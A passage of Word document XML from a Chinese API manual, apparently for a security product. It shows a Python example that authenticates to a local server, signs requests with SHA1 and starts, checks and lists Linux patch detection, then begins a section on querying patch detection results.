              <w:t>执行中；成功；失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="14B92040" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>补丁检测和状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D16E15D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>#! /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/bin/env python</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># -*- coding: utf-8 -*-</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">from __future__ import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>absolute_import</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>httplib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t>import time</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hashlib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>host = "127.0.0.1"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>port = 80</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># 登录请求调用示例</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>def login():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    conn = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>httplib.HTTPConnection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "http://%s:%s/v1/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/auth" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    header = {"Content-Type": "application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    body = {"username": "dev@xx.com", "password": "abc@123"}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json_body</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json.dumps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(body)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>conn.request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(method="POST", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, body=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json_body</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, headers=header)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    response = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>conn.getresponse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>response.read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json.loads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(res)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># 发送请求</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>send_request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(method, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, data):</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 参看登录认证里面的登录方法代码示例</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login_result</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = login()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sign_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login_result.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("data").get("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>signKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>")</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jwt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login_result.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("data").get("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jwt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>")</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login_result.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("data").get("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>")</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t xml:space="preserve">    # 当前时间戳</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = int(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>time.time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>())</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    if data is not None:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        info = ""</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        if method == "GET":</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            # 对参数key进行字典排序</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            keys = sorted(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>data.keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>())</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            for key in keys:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                info = info + key + str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>data.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(key))</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                print info</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elif</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> method == "POST" or method == "PUT" or method == "DELETE":</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            info = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json.dumps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        # 拼接待签名字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>to_sign</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + info + str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sign_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    else:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        # 拼接待签名字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>to_sign</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sign_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>to_sign</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 对待签名字符串进行sha1得到签名字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    sign = hashlib.sha1(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>to_sign</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>).</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hexdigest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    # 组装http请求头参数</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    header = {"Content-Type": "application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">": </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, "timestamp": </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">              "sign": sign, "Authorization": "Bearer " + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jwt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    conn = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>httplib.HTTPConnection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>conn.request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(method=method, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, body=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json.dumps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(data), headers=header)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    response = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>conn.getresponse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>response.read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return res</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>service_patch_check_status</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "http://%s:%s/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/patch/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/check/status" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>send_request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">("GET", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return res</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>is_patch_check_running</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>service_patch_check_status</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json.loads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(res)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    status = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>data.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('status')</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return status == 'Running'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>service_patch_check</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    if not </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>is_patch_check_running</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>start_patch_check</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>start_patch_check</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "http://%s:%s/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/patch/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/check" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>send_request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">("POST", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print "result: ", res</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>get_linux_patch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "http://%s:%s/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/patch/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>list?page</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=0&amp;size=50" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {'page':0, 'size': 50}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>send_request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">("GET", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print "result: ", res</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>if __name__ == '__main__':</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>service_patch_check</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D06369" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="175" w:name="_Toc115166162"/>
      <w:bookmarkStart w:id="176" w:name="查询补丁检测结果"/>
      <w:bookmarkEnd w:id="174"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>查询补丁检测结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="175"/>
    </w:p>
    <w:p w14:paraId="02827696" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620BF7E3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/patch/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux|win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>list</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="00319D6E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7146E7" w14:textId="44F305F6" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>公共参数（详情参见</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:instrText>HYPERLINK \l "基本请求方法" \h</w:instrText>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:fldChar w:fldCharType="separate"/>
